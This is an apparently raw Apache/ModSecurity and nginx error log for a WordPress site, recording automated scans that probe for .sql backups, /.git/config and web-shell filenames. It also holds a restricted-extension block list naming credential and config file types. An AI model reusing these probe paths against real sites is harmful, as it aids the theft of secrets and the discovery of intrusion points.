"OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/investi.sql"] [unique_id "ZfeMi8IahfcLJE-9sPB8fgAAAIQ"] [Sun Mar 17 19:36:27.973422 2024] [:error] [pid 29781:tid 140393175598848] [client 185.181.61.142:48660] [client 185.181.61.142] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/i.sql"] [unique_id "ZfeMizA0xdT7P27nr81T6AAAAEE"] [Sun Mar 17 19:36:28.482728 2024] [:error] [pid 29781:tid 140393085662976] [client 185.181.61.142:48662] [client 185.181.61.142] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/eru.sql"] [unique_id "ZfeMjDA0xdT7P27nr81T6QAAAEM"] [Sun Mar 17 19:36:29.349746 2024] [:error] [pid 29781:tid 140392959772416] [client 185.220.101.102:48664] [client 185.220.101.102] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/daily.sql"] [unique_id "ZfeMjTA0xdT7P27nr81T6gAAAFI"] [Sun Mar 17 19:36:30.284618 2024] [:error] [pid 29781:tid 140393001735936] [client 185.220.101.102:48666] [client 185.220.101.102] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/investig.sql"] [unique_id "ZfeMjjA0xdT7P27nr81T6wAAAE0"] 2024/03/17 20:53:14 [error] 29738#29738: *204300 access forbidden by rule, client: 31.43.185.32, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" [Sun Mar 17 21:15:08.455476 2024] [ssl:warn] [pid 31293:tid 140393366738816] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Mar 17 21:15:16.911588 2024] [ssl:warn] [pid 31293:tid 140393366738816] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Mar 17 21:16:26.772632 2024] [ssl:warn] [pid 31293:tid 140393366738816] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Mar 17 21:19:19.358062 2024] [ssl:warn] [pid 7846:tid 140500439988096] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Mar 17 21:19:27.572364 2024] [ssl:warn] [pid 7872:tid 140500439988096] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Mar 18 03:13:23.532592 2024] [ssl:warn] [pid 7007:tid 139801478506368] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Mar 18 03:13:35.736494 2024] [ssl:warn] [pid 7012:tid 139801478506368] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Mar 18 03:13:36.256005 2024] [ssl:warn] [pid 7012:tid 139801478506368] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Mar 18 03:13:38.202712 2024] [ssl:warn] [pid 7012:tid 139801478506368] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Mar 18 03:13:40.441848 2024] [ssl:warn] [pid 7432:tid 140009084643200] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Mar 18 03:13:48.658975 2024] [ssl:warn] [pid 7436:tid 140009084643200] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name 2024/03/19 00:17:54 [error] 7316#7316: *20047 access forbidden by rule, client: 185.156.72.30, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Tue Mar 19 03:23:50.168332 2024] [ssl:warn] [pid 10364:tid 140340420179840] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Mar 19 03:23:58.497766 2024] [ssl:warn] [pid 10368:tid 140340420179840] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Mar 19 03:23:59.033706 2024] [ssl:warn] [pid 10368:tid 140340420179840] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Mar 19 03:24:00.535871 2024] [ssl:warn] [pid 10368:tid 140340420179840] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Mar 19 03:24:02.901397 2024] [ssl:warn] [pid 10788:tid 140676837336960] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Mar 19 03:24:15.223396 2024] [ssl:warn] [pid 10791:tid 140676837336960] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Mar 19 04:05:52.523797 2024] [autoindex:error] [pid 11448:tid 140676528326400] [client 20.125.140.142:33032] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com 2024/03/19 11:20:36 [error] 10713#10713: *27649 access forbidden by rule, client: 3.249.60.110, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Tue Mar 19 12:04:47.514551 2024] [:error] [pid 10813:tid 140676553504512] [client 45.8.19.71:41842] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/wp-login.php [Tue Mar 19 12:05:06.266238 2024] [:error] [pid 10814:tid 140676503148288] [client 45.8.19.71:41900] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/file.php [Tue Mar 19 12:05:09.418231 2024] [:error] [pid 11448:tid 140676528326400] [client 45.8.19.71:41912] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/content.php [Tue Mar 19 12:05:14.491008 2024] [:error] [pid 12805:tid 140676528326400] [client 45.8.19.71:41932] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/atomlib.php [Tue Mar 19 12:05:18.002762 2024] [:error] [pid 10813:tid 140676394043136] [client 45.8.19.71:41944] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/rrr.php [Tue Mar 19 12:05:20.274503 2024] [:error] [pid 11448:tid 140676511540992] [client 45.8.19.71:41952] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/iR7SzrsOUEP.php [Tue Mar 19 12:05:36.022227 2024] [:error] [pid 12849:tid 140676469577472] [client 45.8.19.71:42004] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/moon.php [Tue Mar 19 12:05:36.107954 2024] [:error] [pid 12843:tid 140676511540992] [client 45.8.19.71:42006] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/install.php [Tue Mar 19 12:05:39.651152 2024] [:error] [pid 12805:tid 140676469577472] [client 45.8.19.71:42018] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/dropdown.php [Tue Mar 19 12:05:42.601423 2024] [:error] [pid 12805:tid 140676427613952] [client 45.8.19.71:42028] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/moon.php [Tue Mar 19 12:06:08.506382 2024] [:error] [pid 12805:tid 140676646196992] [client 45.8.19.71:42106] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/content.php [Tue Mar 19 12:06:19.266150 2024] [:error] [pid 11448:tid 140676436006656] [client 45.8.19.71:42144] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/index.php [Tue Mar 19 12:06:19.413998 2024] [:error] [pid 12843:tid 140676503148288] [client 45.8.19.71:42146] PHP Fatal error: Uncaught Error: Call to undefined function get_header() in /home/investig/public_html/wp-content/themes/twentytwenty/404.php:10 [Tue Mar 19 12:06:19.414089 2024] [:error] [pid 12843:tid 140676503148288] [client 45.8.19.71:42146] Stack trace: [Tue Mar 19 12:06:19.414106 2024] [:error] [pid 12843:tid 140676503148288] [client 45.8.19.71:42146] #0 {main} [Tue Mar 19 12:06:19.414217 2024] [:error] [pid 12843:tid 140676503148288] [client 45.8.19.71:42146] thrown in /home/investig/public_html/wp-content/themes/twentytwenty/404.php on line 10 [Tue Mar 19 12:06:31.206820 2024] [:error] [pid 11448:tid 140676477970176] [client 45.8.19.71:42190] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/install.php [Tue Mar 19 12:06:37.550989 2024] [:error] [pid 10814:tid 140676545111808] [client 45.8.19.71:42214] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Tue Mar 19 12:06:42.033830 2024] [:error] [pid 10814:tid 140676444399360] [client 45.8.19.71:42228] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/index.php [Tue Mar 19 12:06:42.844924 2024] [:error] [pid 12805:tid 140676519933696] [client 45.8.19.71:42232] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/atomlib.php [Tue Mar 19 12:06:47.378752 2024] [:error] [pid 10814:tid 140676486362880] [client 45.8.19.71:42246] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/admin.php [Tue Mar 19 12:06:51.313830 2024] [:error] [pid 10815:tid 140676402435840] [client 45.8.19.71:42258] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/admin.php [Tue Mar 19 12:07:00.638209 2024] [:error] [pid 10814:tid 140676654589696] [client 45.8.19.71:42288] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/iR7SzrsOUEP.php [Tue Mar 19 12:07:00.751303 2024] [:error] [pid 12843:tid 140676436006656] [client 45.8.19.71:42290] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/ssl.php [Tue Mar 19 12:07:08.078490 2024] [:error] [pid 10814:tid 140676494755584] [client 45.8.19.71:42310] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Tue Mar 19 12:07:34.066555 2024] [:error] [pid 10814:tid 140676477970176] [client 45.8.19.71:42404] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Tue Mar 19 12:07:34.158862 2024] [:error] [pid 12805:tid 140676528326400] [client 45.8.19.71:42406] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Tue Mar 19 12:07:35.730729 2024] [:error] [pid 10814:tid 140676494755584] [client 45.8.19.71:42414] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Tue Mar 19 12:07:36.530289 2024] [:error] [pid 10814:tid 140676402435840] [client 45.8.19.71:42420] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/license.php [Tue Mar 19 12:08:02.901997 2024] [:error] [pid 10815:tid 140676519933696] [client 45.8.19.71:42504] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Tue Mar 19 12:08:07.918088 2024] [:error] [pid 10814:tid 140676452792064] [client 45.8.19.71:42524] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/wp-login.php [Tue Mar 19 12:08:26.581987 2024] [:error] [pid 12805:tid 140676410828544] [client 45.8.19.71:42598] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/lang-load-role.php [Tue Mar 19 12:14:22.066801 2024] [:error] [pid 10814:tid 140676637804288] [client 45.8.19.71:43726] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/wso112233.php [Tue Mar 19 12:14:28.847220 2024] [:error] [pid 10814:tid 140676385650432] [client 45.8.19.71:43746] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/shell20211028.php [Tue Mar 19 12:14:34.484946 2024] [:error] [pid 10814:tid 140676545111808] [client 45.8.19.71:43768] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/bala.php [Tue Mar 19 12:14:42.063046 2024] [:error] [pid 12805:tid 140676477970176] [client 45.8.19.71:43790] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xl2023.php [Tue Mar 19 12:14:42.150653 2024] [:error] [pid 12805:tid 140676452792064] [client 45.8.19.71:43792] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xl2023.php [Tue Mar 19 12:15:07.192339 2024] [:error] [pid 10814:tid 140676452792064] [client 45.8.19.71:43862] PHP Fatal error: Uncaught Error: Call to undefined function __() in /home/investig/public_html/wp-admin/includes/file.php:16 [Tue Mar 19 12:15:07.192433 2024] [:error] [pid 10814:tid 140676452792064] [client 45.8.19.71:43862] Stack trace: [Tue Mar 19 12:15:07.192461 2024] [:error] [pid 10814:tid 140676452792064] [client 45.8.19.71:43862] #0 {main} [Tue Mar 19 12:15:07.192558 2024] [:error] [pid 10814:tid 140676452792064] [client 45.8.19.71:43862] thrown in /home/investig/public_html/wp-admin/includes/file.php on line 16 [Tue Mar 19 12:15:34.703278 2024] [:error] [pid 12849:tid 140676519933696] [client 45.8.19.71:43948] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/termps.php [Tue Mar 19 12:15:53.631167 2024] [:error] [pid 12849:tid 140676528326400] [client 45.8.19.71:44004] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/file.php [Tue Mar 19 12:16:00.831023 2024] [:error] [pid 12805:tid 140676452792064] [client 45.8.19.71:44034] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/plugins.php [Tue Mar 19 12:16:04.750385 2024] [:error] [pid 12735:tid 140676469577472] [client 45.8.19.71:44048] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/plugins.php [Tue Mar 19 12:16:09.274988 2024] [autoindex:error] [pid 12849:tid 140676436006656] [client 45.8.19.71:44062] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive 2024/03/19 12:16:09 [error] 10714#10714: *29637 directory index of "/usr/local/apache/autossl_tmp/.well-known/acme-challenge/" is forbidden, client: 45.8.19.69, server: investigacionperu.com, request: "GET /.well-known/acme-challenge/ HTTP/1.1", host: "investigacionperu.com" [Tue Mar 19 12:16:09.621776 2024] [autoindex:error] [pid 12843:tid 140676654589696] [client 45.8.19.69:44064] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 19 12:16:10.649697 2024] [autoindex:error] [pid 10813:tid 140676410828544] [client 45.8.19.69:44070] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 19 12:16:10.732875 2024] [autoindex:error] [pid 12843:tid 140676629411584] [client 45.8.19.69:44072] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/js/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 19 12:16:10.817044 2024] [autoindex:error] [pid 11448:tid 140676385650432] [client 45.8.19.69:44074] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/blue/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 19 12:16:14.036834 2024] [autoindex:error] [pid 10814:tid 140676553504512] [client 45.8.19.69:44084] AH01276: Cannot serve directory /home/investig/public_html/.well-known/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 19 12:16:14.133716 2024] [autoindex:error] [pid 10813:tid 140676452792064] [client 45.8.19.69:44086] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/coffee/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 19 12:16:14.304231 2024] [autoindex:error] [pid 10814:tid 140676536719104] [client 45.8.19.69:44090] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Text/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 19 12:16:14.388295 2024] [autoindex:error] [pid 11448:tid 140676469577472] [client 45.8.19.69:44092] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/maint/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 19 12:16:14.473142 2024] [autoindex:error] [pid 12735:tid 140676646196992] [client 45.8.19.69:44094] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/IXR/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive 2024/03/19 12:16:14 [error] 10714#10714: *29637 directory index of "/usr/local/apache/autossl_tmp/.well-known/acme-challenge/" is forbidden, client: 45.8.19.69, server: investigacionperu.com, request: "GET /.well-known/pki-validation/ HTTP/1.1", host: "investigacionperu.com" [Tue Mar 19 12:16:15.340316 2024] [autoindex:error] [pid 10814:tid 140676486362880] [client 45.8.19.69:44098] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/midnight/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 19 12:16:16.124365 2024] [autoindex:error] [pid 11448:tid 140676654589696] [client 45.8.19.69:44102] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 19 12:16:19.017016 2024] [autoindex:error] [pid 11448:tid 140676528326400] [client 45.8.19.69:44112] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 19 12:16:20.660240 2024] [autoindex:error] [pid 10814:tid 140676528326400] [client 45.8.19.69:44120] AH01276: Cannot serve directory /home/investig/public_html/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 19 12:16:22.188669 2024] [autoindex:error] [pid 12735:tid 140676519933696] [client 45.8.19.69:44126] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/customize/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 19 12:16:22.272621 2024] [autoindex:error] [pid 12735:tid 140676536719104] [client 45.8.19.69:44128] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/SimplePie/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 19 12:16:23.013939 2024] [autoindex:error] [pid 10814:tid 140676436006656] [client 45.8.19.69:44136] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/skins/wordpress/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 19 12:16:23.097312 2024] [autoindex:error] [pid 10814:tid 140676519933696] [client 45.8.19.69:44138] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/2023/05/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 19 12:16:23.917285 2024] [autoindex:error] [pid 10815:tid 140676494755584] [client 45.8.19.69:44144] AH01276: Cannot serve directory /home/investig/public_html/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 19 12:16:24.699285 2024] [:error] [pid 12805:tid 140676394043136] [client 45.8.19.69:44148] PHP Fatal error: Uncaught Error: Call to undefined function get_header() in /home/investig/public_html/wp-content/themes/twentytwenty/index.php:17 [Tue Mar 19 12:16:24.699361 2024] [:error] [pid 12805:tid 140676394043136] [client 45.8.19.69:44148] Stack trace: [Tue Mar 19 12:16:24.699371 2024] [:error] [pid 12805:tid 140676394043136] [client 45.8.19.69:44148] #0 {main} [Tue Mar 19 12:16:24.699446 2024] [:error] [pid 12805:tid 140676394043136] [client 45.8.19.69:44148] thrown in /home/investig/public_html/wp-content/themes/twentytwenty/index.php on line 17 [Tue Mar 19 12:16:24.788576 2024] [autoindex:error] [pid 12849:tid 140676469577472] [client 45.8.19.69:44150] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/random_compat/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 19 12:16:24.872468 2024] [autoindex:error] [pid 10815:tid 140676402435840] [client 45.8.19.69:44152] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/plugins/compat3x/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Mar 19 12:16:25.616415 2024] [autoindex:error] [pid 11448:tid 140676646196992] [client 45.8.19.69:44156] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/includes/: No matching DirectoryIndex 